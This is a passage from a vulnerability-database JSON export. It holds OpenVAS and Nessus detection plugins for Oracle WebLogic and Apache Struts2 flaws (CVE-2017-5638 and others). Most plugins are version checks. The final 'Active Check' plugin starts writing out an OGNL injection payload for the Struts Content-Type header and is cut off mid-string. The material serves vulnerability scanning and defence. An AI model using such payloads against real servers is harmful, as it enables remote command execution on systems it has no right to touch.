NULL;\nfix_ver = NULL;\n\n# individual security patches\nif (version =~ \"^10\\.3\\.6\\.\")\n{\n fix_ver = \"10.3.6.0.170418\";\n fix = \"25388747\";\n}\nelse if (version =~ \"^12\\.1\\.3\\.\")\n{\n fix_ver = \"12.1.3.0.170418\";\n fix = \"25388793\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.0($|[^0-9])\")\n{\n fix_ver = \"12.2.1.0.170418\";\n fix = \"25388847\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.1($|[^0-9])\")\n{\n fix_ver = \"12.2.1.1.170418\";\n fix = \"25388843\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.2($|[^0-9])\")\n{\n fix_ver = \"12.2.1.2.170418\";\n fix = \"25388866\";\n}\n\nif (!isnull(fix_ver) && ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)\n{\n port = 0;\n report =\n '\\n Oracle home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version +\n '\\n Required patch : ' + fix +\n '\\n';\n security_report_v4(extra:report, port:port, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n", "naslFamily": "Misc.", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "solution": "Apply the appropriate patch according to the April 2017 Oracle Critical Patch Update advisory.", "nessusSeverity": "Critical", "cvssScoreSource": "CVE-2017-5638", "vendor_cvss2": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "vendor_cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "vpr": {"risk factor": "Critical", "score": "9.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-04-18T00:00:00", "vulnerabilityPublicationDate": "2016-06-07T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(Apache Struts Jakarta Multipart Parser OGNL Injection)"]}

{"openvas": [{"lastseen": "2020-04-29T22:07:15", "description": "Oracle WebLogic Server is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-04-19T00:00:00", "type": "openvas", "title": "Oracle WebLogic Server Multiple Vulnerabilities-01 (cpuapr2017-3236618)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3506", "CVE-2017-5638", "CVE-2016-1181"], "modified": "2020-04-27T00:00:00", "id": "OPENVAS:1361412562310810748", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810748", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle WebLogic Server Multiple Vulnerabilities-01 (cpuapr2017-3236618)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bea:weblogic_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810748\");\n script_version(\"2020-04-27T04:21:52+0000\");\n script_cve_id(\"CVE-2017-5638\", \"CVE-2016-1181\", \"CVE-2017-3506\");\n script_bugtraq_id(96729, 91068, 97884);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 04:21:52 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-04-19 14:58:02 +0530 (Wed, 19 Apr 2017)\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_name(\"Oracle WebLogic Server Multiple Vulnerabilities-01 (cpuapr2017-3236618)\");\n\n script_tag(name:\"summary\", value:\"Oracle WebLogic Server is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaws exist due to some unspecified error in the 'Samples (Struts 2)' and\n 'Web Services' sub-component within Oracle WebLogic Server.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary commands.\");\n\n script_tag(name:\"affected\", value:\"Oracle WebLogic Server versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_oracle_weblogic_consolidation.nasl\");\n script_mandatory_keys(\"oracle/weblogic/detected\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!version = get_app_version(cpe:CPE, nofork:TRUE))\n exit(0);\n\naffected = make_list('10.3.6.0.0', '12.1.3.0.0', '12.2.1.0.0', '12.2.1.2.0', '12.2.1.1.0');\n\nforeach af (affected) {\n if( version == af) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"See advisory\");\n security_message(data:report, port:0);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-29T22:05:37", "description": "Oracle WebLogic Server is prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2017-04-19T00:00:00", "type": "openvas", "title": "Oracle WebLogic Server 'Servlet Runtime' RCE Vulnerability (cpuapr2017-3236618)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3531"], "modified": "2020-04-27T00:00:00", "id": "OPENVAS:1361412562310810749", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810749", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle WebLogic Server 'Servlet Runtime' RCE Vulnerability (cpuapr2017-3236618)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bea:weblogic_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810749\");\n script_version(\"2020-04-27T04:21:52+0000\");\n script_cve_id(\"CVE-2017-3531\");\n script_bugtraq_id(97894);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 04:21:52 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-04-19 15:13:16 +0530 (Wed, 19 Apr 2017)\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_name(\"Oracle WebLogic Server 'Servlet Runtime' RCE Vulnerability (cpuapr2017-3236618)\");\n\n script_tag(name:\"summary\", value:\"Oracle WebLogic Server is prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to some unspecified error in the 'Servlet Runtime'\n sub-component within Oracle WebLogic Server.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Oracle WebLogic Server versions 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2.\");\n\n script_tag(name:\"solution\", value:\"See the referenced advisory for a solution.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_oracle_weblogic_consolidation.nasl\");\n script_mandatory_keys(\"oracle/weblogic/detected\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!version = get_app_version(cpe:CPE, nofork:TRUE))\n exit(0);\n\naffected = make_list('12.1.3.0.0', '12.2.1.0.0', '12.2.1.2.0', '12.2.1.1.0');\n\nforeach af (affected) {\n if( version == af) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"See advisory\");\n security_message(data:report, port:0);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-06-09T17:43:22", "description": "Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website.", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Apache Struts2 Remote Code Execution Vulnerability in Huawei Products (huawei-sa-20170316-01-struts2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108771", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108771", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108771\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Apache Struts2 Remote Code Execution Vulnerability in Huawei Products (huawei-sa-20170316-01-struts2)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website.\");\n\n script_tag(name:\"insight\", value:\"Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website. An attacker is possible to perform a RCE (Remote Code Execution) attack with a malicious Content-Type value. (Vulnerability ID: HWPSIRT-2017-03094)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2017-5638.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"An attacker is possible to perform a RCE (Remote Code Execution) attack with a malicious Content-Type value.\");\n\n script_tag(name:\"affected\", value:\"AAA versions V300R003C30 V500R005C00 V500R005C10 V500R005C11 V500R005C12\n\nAnyOffice versions 2.5.0302.0201T 2.5.0501.0290\n\niManager NetEco 6000 versions V600R007C91\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170316-01-struts2-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:29", "description": "Atlassian Crowd is prone to a remote code execution vulnerability in\nStruts2.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "openvas", "title": "Atlassian Crowd Struts2 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106653", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106653", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_crowd_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Atlassian Crowd Struts2 RCE Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atlassian:crowd\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106653\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 11:39:14 +0700 (Wed, 15 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Atlassian Crowd Struts2 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_crowd_detect.nasl\");\n script_mandatory_keys(\"atlassian_crowd/installed\");\n\n script_tag(name:\"summary\", value:\"Atlassian Crowd is prone to a remote code execution vulnerability in\nStruts2.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Crowd uses a version of Struts 2 that is vulnerable to CVE-2017-5638.\nAttackers can use this vulnerability to execute Java code of their choice on the system.\");\n\n script_tag(name:\"affected\", value:\"Atlassiona Crowd 2.8.3 until 2.9.6, 2.10.1 until 2.10.2 and 2.11.0.\");\n\n script_tag(name:\"solution\", value:\"Update to version 2.9.7, 2.10.3, 2.11.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://jira.atlassian.com/browse/CWD-4879\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"2.8.3\", test_version2: \"2.9.6\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.9.7\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"2.10.1\", test_version2: \"2.10.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.10.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_is_equal(version: version, test_version: \"2.11.0\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.11.1\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:33", "description": "Cisco Unified Communications Manager IM and Presence Service is prone to a\n vulnerability in Apache Struts2.", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "openvas", "title": "Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-03-05T00:00:00", "id": "OPENVAS:1361412562310106646", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106646", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_cucmim_cisco-sa-20170310-struts2.nasl 13999 2019-03-05 13:15:01Z cfischer $\n#\n# Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:unified_communications_manager_im_and_presence_service\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106646\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 13999 $\");\n\n script_name(\"Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco Unified Communications Manager IM and Presence Service is prone to a\n vulnerability in Apache Struts2.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-05 14:15:01 +0100 (Tue, 05 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-14 09:51:18 +0700 (Tue, 14 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_cucmim_version.nasl\");\n script_mandatory_keys(\"cisco/cucmim/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\nversion = str_replace( string:version, find:\"-\", replace:\".\" );\n\nif (version =~ \"^11\\.0\" || version =~ \"^11\\.5\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:55", "description": "Atlassian Bamboo is prone to a remote code execution vulnerability in\nStruts2.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "openvas", "title": "Atlassian Bamboo Struts2 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106652", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106652", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_bamboo_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Atlassian Bamboo Struts2 RCE Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atlassian:bamboo\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106652\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 11:39:14 +0700 (Wed, 15 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Atlassian Bamboo Struts2 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_bamboo_detect.nasl\");\n script_mandatory_keys(\"AtlassianBamboo/Installed\");\n\n script_tag(name:\"summary\", value:\"Atlassian Bamboo is prone to a remote code execution vulnerability in\nStruts2.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Bamboo uses a version of Struts 2 that is vulnerable to CVE-2017-5638.\nAttackers can use this vulnerability to execute Java code of their choice on the system.\");\n\n script_tag(name:\"affected\", value:\"Atlassiona Bamboo 5.1 until 5.14.4, 5.15.0 until 5.15.2.\");\n\n script_tag(name:\"solution\", value:\"Update to 5.14.5, 5.15.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://jira.atlassian.com/browse/BAM-18242\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"5.1.0\", test_version2: \"5.14.4\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.14.5\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"5.15.0\", test_version2: \"5.15.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.15.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-26T15:41:09", "description": "Apache Struts is prone to a remote code-execution vulnerability.", "cvss3": {}, "published": "2017-03-08T00:00:00", "type": "openvas", "title": "Apache Struts Remote Code Execution Vulnerability (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2020-06-25T00:00:00", "id": "OPENVAS:1361412562310140180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140180", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts Remote Code Execution Vulnerability (Active Check)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140180\");\n script_version(\"2020-06-25T07:01:49+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-25 07:01:49 +0000 (Thu, 25 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-08 12:19:09 +0100 (Wed, 08 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_name(\"Apache Struts Remote Code Execution Vulnerability (Active Check)\");\n\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\", \"gb_vmware_vcenter_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue may allow an attacker to execute arbitrary\n code in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP POST request.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references or vendor advisory for\n more information.\");\n\n script_tag(name:\"summary\", value:\"Apache Struts is prone to a remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nport = http_get_port( default:80 );\nhost = http_host_name( dont_add_port:TRUE );\n\nurls = make_list( );\n\nforeach ext( make_list( \"action\", \"do\", \"jsp\" ) ) {\n exts = http_get_kb_file_extensions( port:port, host:host, ext:ext );\n if( exts && is_array( exts ) ) {\n urls = make_list( urls, exts );\n }\n}\n\nif( get_kb_item( \"VMware_vCenter/installed\" ) )\n urls = make_list( \"/statsreport/\", urls );\n\ncmds = exploit_commands();\n\nx = 0;\n\nvt_strings = get_vt_strings();\n\nforeach url ( urls )\n{\n bound = vt_strings[\"default_rand\"];\n\n data = '--' + bound + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"' + vt_strings[\"default\"] + '\"; filename=\"' + vt_strings[\"default\"] + '.txt\"\\r\\n' +\n 'Content-Type: text/plain\\r\\n' +\n '\\r\\n' +\n vt_strings[\"default\"] + '\\r\\n' +\n '\\r\\n' +\n '--' + bound + '--';\n\n foreach cmd ( keys( cmds ) )\n {\n c = \"{'\" + cmds[ cmd ] + \"'}\";\n\n ex = \"%{(#\" + vt_strings[\"default\"] + \"='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):\" +\n \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.\" +\n 